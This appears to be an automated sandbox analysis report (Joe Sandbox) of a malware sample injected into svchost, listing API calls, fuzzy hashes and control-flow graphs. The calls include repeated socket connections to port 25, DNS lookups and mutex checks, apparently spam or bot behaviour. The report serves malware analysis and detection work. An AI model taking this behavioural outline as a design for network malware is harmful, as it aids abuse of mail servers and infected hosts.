                                                                                                                                                                                • Instruction ID: 419d3c6777e993e7358b4fad858bdbe2f704fa2787bc25a9698b8ab6963bd5de
                                                                                                                                                                                • Opcode Fuzzy Hash: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                • Instruction Fuzzy Hash: 50518176A04605EFDB21CF98C981E9AB7B9FF08314F284029E65AD7290D731E950CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 1314AF0D
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,00000000), ref: 1314AFCC
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,-00000004,00000082), ref: 1314AFEE
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 1314AFF2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrcpylstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2274183309-0
                                                                                                                                                                                • Opcode ID: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction ID: 984daec6d2f47008fb8d3025faa8029e27d34ef63afc459df32f1da8c8b08b8e
                                                                                                                                                                                • Opcode Fuzzy Hash: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction Fuzzy Hash: 253130B6A00319AFDB00DFA9CD909AEB7FDFF48644B56447AE545E7210E730EA418B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,76B26490), ref: 13151248
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 13151267
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,-00000004,0000004C,570000AF), ref: 131512A4
                                                                                                                                                                                • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000008), ref: 13151323
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Entersetsockopt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2622634160-0
                                                                                                                                                                                • Opcode ID: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                • Instruction ID: 23073220f776133a972de4463eb0e075911ea0260f81aa9f22f346945dc2a4f5
                                                                                                                                                                                • Opcode Fuzzy Hash: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                • Instruction Fuzzy Hash: 793118B5A047419FC720DF5AC98194AFBF4FB09324B908A3EE5AAD7A90C770A545CF10
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314BD1F
                                                                                                                                                                                • setsockopt.WS2_32(1314CF4F,0000FFFF,00001005,?,00000004), ref: 1314BD68
                                                                                                                                                                                • setsockopt.WS2_32(1314CF4F,0000FFFF,00001006,?,00000004), ref: 1314BD7B
                                                                                                                                                                                • connect.WS2_32(1314CF4F,00000002,00000010), ref: 1314BD88
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: setsockopt$connecthtons
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3400676187-0
                                                                                                                                                                                • Opcode ID: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                • Instruction ID: e84e74bdb04a0a8647a6cae6d0c50be21cee2977d7f6e1224aa6945bccac1f85
                                                                                                                                                                                • Opcode Fuzzy Hash: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                • Instruction Fuzzy Hash: 05016979A40349BBEB11DBA8CC06EEFB779AF85700F100439FA45AB1D0D7B0AA049B51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13152BED: __amsg_exit.LIBCMT ref: 13152BFB
                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 1315432B
                                                                                                                                                                                • __lock.LIBCMT ref: 1315433B
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 13154358
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08), ref: 13154383
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4129207761-0
                                                                                                                                                                                • Opcode ID: fbd2b2b42058274c9e1e40ad0aec4839c2dda945ff8203164f757b40e5767281
                                                                                                                                                                                • Instruction ID: 20be28432fdb317510c556bdc8dbfa4516dcce9ab8cffca2a6a1a2e38269f76f
                                                                                                                                                                                • Opcode Fuzzy Hash: fbd2b2b42058274c9e1e40ad0aec4839c2dda945ff8203164f757b40e5767281
                                                                                                                                                                                • Instruction Fuzzy Hash: CA018E36B41731DBDB85AF69958478D7260BF03611F484115F470B7650DB386942CBE1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000001,00000000,13152EF7,13152D98,00000001,1315294F,?,00000000,00000000,?,?,?,13152A61,?,13152F12,?), ref: 13152B78
                                                                                                                                                                                  • Part of subcall function 13152A85: TlsGetValue.KERNEL32(00000000,13152B8B,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476), ref: 13152A8C
                                                                                                                                                                                  • Part of subcall function 13152A85: TlsSetValue.KERNEL32(00000000,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152AAD
                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 13152B9A
                                                                                                                                                                                  • Part of subcall function 13152F45: __calloc_impl.LIBCMT ref: 13152F53
                                                                                                                                                                                  • Part of subcall function 13152F45: Sleep.KERNEL32(00000000), ref: 13152F6A
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                  • Part of subcall function 13152AB7: GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569C8,0000000C,13152BC8,00000000,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 13152AC8
                                                                                                                                                                                  • Part of subcall function 13152AB7: GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152AFC
                                                                                                                                                                                  • Part of subcall function 13152AB7: GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B0C
                                                                                                                                                                                  • Part of subcall function 13152AB7: InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B2E
                                                                                                                                                                                  • Part of subcall function 13152AB7: __lock.LIBCMT ref: 13152B36
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13152BCA
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152BE2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread__calloc_crt__calloc_impl__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2539975944-0
                                                                                                                                                                                • Opcode ID: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction ID: 3867756d27c0135bee374bf51de64289947cab669b26ec1be1cedbf1d942a3e8
                                                                                                                                                                                • Opcode Fuzzy Hash: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0C8376057726BD73A3B785C45BCA3B549F066B1B254529F830D71C0DF74D84286A0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • __lock.LIBCMT ref: 131524AC
                                                                                                                                                                                  • Part of subcall function 1315245D: __mtinitlocknum.LIBCMT ref: 13152471
                                                                                                                                                                                  • Part of subcall function 1315245D: __amsg_exit.LIBCMT ref: 1315247D
                                                                                                                                                                                  • Part of subcall function 1315245D: EnterCriticalSection.KERNEL32(?,?,?,131520C2,0000000E,13156928,0000000C,13151F97), ref: 13152485
                                                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 131524B7
                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,13156988,0000000C,13152BDE,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 131524F6
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152507
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 568605419-0
                                                                                                                                                                                • Opcode ID: e9114d0c0ff4a43fac76cc6f14c2f50f79e9beee09b5af3449e75a3f86d0cf08
                                                                                                                                                                                • Instruction ID: 97e5660a8f24ec920a53af5c230e12b3f3b18b346be0e6faeaed023650b73dfe
                                                                                                                                                                                • Opcode Fuzzy Hash: e9114d0c0ff4a43fac76cc6f14c2f50f79e9beee09b5af3449e75a3f86d0cf08
                                                                                                                                                                                • Instruction Fuzzy Hash: A701D637A04352EFDB245FB99D14BDD37A8EF03325F248029F074A7180CB34A142CA65
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 131472EB
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 131472FE
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 1314732B
                                                                                                                                                                                • wsprintfA.USER32 ref: 1314734E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction ID: 81c63a60cc059b6bfd8228d21a569bd5be14de8077915da8032e81f50a11be82
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction Fuzzy Hash: AF014FB2900219ABEB08EFF4CC85ED93B6DEB04258F114022F916E2154DB74D9848B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000), ref: 131478D7
                                                                                                                                                                                • lstrlenA.KERNEL32(?,00000079,00000078,00000077,00000076,00000072,00000073,00000075,00000074,00000000,?,?,00000000), ref: 13147991
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1659193697-0
                                                                                                                                                                                • Opcode ID: e7f9391607f021f4d8924145494e6a8032ec71588c8ab831527aa72afbe9283c
                                                                                                                                                                                • Instruction ID: 8dd164e209e03d13d7b080f773f999a28fe30cacf76840b08c0393114a442a66
                                                                                                                                                                                • Opcode Fuzzy Hash: e7f9391607f021f4d8924145494e6a8032ec71588c8ab831527aa72afbe9283c
                                                                                                                                                                                • Instruction Fuzzy Hash: F8812576A043899FDB21CF78CC90BEE3BA5AF91304F3C4069E86587242E775E546CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A8,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AC3
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A4,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150ADC
                                                                                                                                                                                • CharUpperBuffA.USER32(?,00000001,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AEC
                                                                                                                                                                                • CharUpperBuffA.USER32(00000001,00000001,?,-00000004,-00000008,?,?,13145A1C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AF6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3964851224-0
                                                                                                                                                                                • Opcode ID: 57765c3c445889a43e435764364cbc31ae2d5125bd47808fc7dd29a1bfb32e86
                                                                                                                                                                                • Instruction ID: 8a890dfedadfda042d93f051d7c424d01016adc2c87a64bcc8cd4253731e0296
                                                                                                                                                                                • Opcode Fuzzy Hash: 57765c3c445889a43e435764364cbc31ae2d5125bd47808fc7dd29a1bfb32e86
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F513BB5A00249EFD711DFACC980DAEBBF8FF59304B254469F895E7201D731AA50CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(03801028,13161EF0,00000000,03801020,03801020,?,1314CD55,?,13161EF0,131616E8), ref: 131518DE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(03801028,?,1314CD55,?), ref: 131518EB
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(03801028,131616E8,?,1314CD55,?), ref: 131518FE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,131616E8,?,1314CD55,?), ref: 13151917
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction ID: b084411877ebf042b22e5047ccc07a2e31583f90b1ca21c5034c9ad215dd48ba
                                                                                                                                                                                • Opcode Fuzzy Hash: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 00216A79600245EFC709CF56C58495AB7BAFF8A325B258479E5679B311C730F881CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,1314B98F,?,00000000,-00000004,0000003B,?,00000000,00000000,00000000,?,1468EC68,00000000), ref: 1315152A
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 13151538
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,131616E8,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 1315154D
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,000003E8,0000000C), ref: 13151587
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction ID: 3189dacb6dec9ddd2fbf7ef972df95b778389ddc3128e999783537223a99cae5
                                                                                                                                                                                • Opcode Fuzzy Hash: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction Fuzzy Hash: 59012D356143619FCB229F6ACDC8816B7E9AF4B6607094939F597D3211C730E844CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 1314e022-1314e084 GetSystemTime call 1314ffe0 GetTickCount * 2 3 1314e086 0->3 4 1314e08d-1314e090 0->4 3->4 5 1314e092-1314e0ca call 13144eb1 * 2 call 13145b8d call 13144ec3 * 2 4->5 6 1314e0cd-1314e0d3 4->6 5->6 7 1314e19c-1314e1ad call 1314daf3 6->7 8 1314e0d9-1314e0e0 6->8 19 1314e2a7-1314e2e1 shutdown closesocket call 13142f89 call 131506de 7->19 20 1314e1b3-1314e1c7 OpenMutexA 7->20 11 1314e0f5-1314e107 socket 8->11 12 1314e0e2-1314e0f0 shutdown closesocket 8->12 15 1314e10d-1314e142 call 13142f89 call 131506de 11->15 16 1314e32e-1314e35b ExitProcess GetTickCount 11->16 12->11 42 1314e144 15->42 43 1314e14b-1314e16a htons connect 15->43 23 1314e362-1314e390 call 13144d1b htons 16->23 19->4 46 1314e2e7-1314e329 call 13144c2f call 13144eb1 * 2 call 1314df63 call 13144ec3 * 2 19->46 24 1314e1d7-1314e1f8 call 13144c2f GetTickCount call 1314dfa8 20->24 25 1314e1c9-1314e1d1 CreateMutexA 20->25 40 1314e393-1314e399 23->40 24->4 56 1314e1fe-1314e21a call 13142f89 call 131506de 24->56 25->24 47 1314e3f9 40->47 48 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 40->48 42->43 50 1314e16c-1314e177 call 1314d187 43->50 51 1314e179-1314e184 GetLastError Sleep 43->51 46->4 57 1314e3fb-1314e401 47->57 68 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 48->68 69 1314e3f0-1314e3f7 48->69 53 1314e18a-1314e196 50->53 51->53 53->4 53->7 86 1314e21c-1314e228 closesocket 56->86 87 1314e22d-1314e259 call 13142f89 call 131506de GetTickCount 56->87 62 1314e472-1314e47f 57->62 63 1314e403-1314e409 57->63 65 1314e481-1314e488 62->65 66 1314e49a-1314e4ba call 13142f89 call 131506de 62->66 71 1314e467-1314e470 63->71 72 1314e40b-1314e44f socket setsockopt connect 63->72 75 1314e489-1314e48b 65->75 66->23 95 1314e4c0-1314e4c6 66->95 68->69 69->40 69->47 71->57 71->62 73 1314e461-1314e462 closesocket 72->73 74 1314e451-1314e45c recv 72->74 73->71 74->73 81 1314e494-1314e498 75->81 82 1314e48d 75->82 81->66 81->75 82->81 86->87 87->4 102 1314e25f-1314e29a Sleep call 13142f89 call 131506de GetTickCount 87->102 95->23 98 1314e4cc-1314e4da Sleep 95->98 98->95 101 1314e4dc 98->101 101->23 109 1314e29c-1314e2a2 102->109 109->4
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTime.KERNEL32(?,00020000,76B5EEA0,00000000), ref: 1314E02F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E04A
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E051
                                                                                                                                                                                • shutdown.WS2_32(?,00000002), ref: 1314E0E5
                                                                                                                                                                                • closesocket.WS2_32(?), ref: 1314E0F0
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 1314E0FA
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E14E
                                                                                                                                                                                • connect.WS2_32(00000002,00000010,00000019), ref: 1314E163
                                                                                                                                                                                • GetLastError.KERNEL32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E179
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1314E184
                                                                                                                                                                                • OpenMutexA.KERNEL32 ref: 1314E1BF
                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000), ref: 1314E1D1
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E1E8
                                                                                                                                                                                • closesocket.WS2_32(-00000004), ref: 1314E228
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E24F
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1314E264
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E28C
                                                                                                                                                                                • shutdown.WS2_32(00000002,00000000), ref: 1314E2B5
                                                                                                                                                                                • closesocket.WS2_32 ref: 1314E2C0
                                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000002,00000001,00000000), ref: 1314E32E
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E347
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E387
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3BE
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3EB
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 1314E411
                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E433
                                                                                                                                                                                • connect.WS2_32(00000000,00000002,00000010), ref: 1314E448
                                                                                                                                                                                • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E45C
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314E462
                                                                                                                                                                                • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$closesocket$Sleep$Mutexconnecthtonsshutdownsocket$CreateErrorExitFreeLastListOpenProcessQuery_RecordSystemTimerecvsetsockopt
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 850683436-3203441087
                                                                                                                                                                                • Opcode ID: c8b64258001e370bbd683c5772ae33d7400adee99e8d36d9e8e4e8549de03ca8
                                                                                                                                                                                • Instruction ID: 43d5bb9465e87192af08d7f6881986c4e70353d981fa44b77742f62da2d52e8e
                                                                                                                                                                                • Opcode Fuzzy Hash: c8b64258001e370bbd683c5772ae33d7400adee99e8d36d9e8e4e8549de03ca8
                                                                                                                                                                                • Instruction Fuzzy Hash: 17C1BFB5904369BBDB12AFB8CCC5AAEB77DFB05708F240539E509B3150EB786940CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000002,00000001,00000000,00000000), ref: 13143EFA
                                                                                                                                                                                • htons.WS2_32(00000035), ref: 13143F44
                                                                                                                                                                                • htons.WS2_32(00000035), ref: 13143F58
                                                                                                                                                                                • Sleep.KERNEL32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: htons$ReadSleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 317343359-0
                                                                                                                                                                                • Opcode ID: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                • Instruction ID: ed5b5b64522fe66a5ea052113b0c2f9187125999cf5ff2d51e395da3c559b608
                                                                                                                                                                                • Opcode Fuzzy Hash: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                • Instruction Fuzzy Hash: 40A1C075D40289EFCB01CFA8CD84DDEBBB9AF15304F2940A9E944B7251DB31AE44CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 169 1314e335-1314e35b GetTickCount 170 1314e362-1314e390 call 13144d1b htons 169->170 173 1314e393-1314e399 170->173 174 1314e3f9 173->174 175 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 173->175 177 1314e3fb-1314e401 174->177 183 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 175->183 184 1314e3f0-1314e3f7 175->184 179 1314e472-1314e47f 177->179 180 1314e403-1314e409 177->180 181 1314e481-1314e488 179->181 182 1314e49a-1314e4ba call 13142f89 call 131506de 179->182 185 1314e467-1314e470 180->185 186 1314e40b-1314e44f socket setsockopt connect 180->186 189 1314e489-1314e48b 181->189 182->170 198 1314e4c0-1314e4c6 182->198 183->184 184->173 184->174 185->177 185->179 187 1314e461-1314e462 closesocket 186->187 188 1314e451-1314e45c recv 186->188 187->185 188->187 192 1314e494-1314e498 189->192 193 1314e48d 189->193 192->182 192->189 193->192 198->170 199 1314e4cc-1314e4da Sleep 198->199 199->198 200 1314e4dc 199->200 200->170
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E347
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E387
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3BE
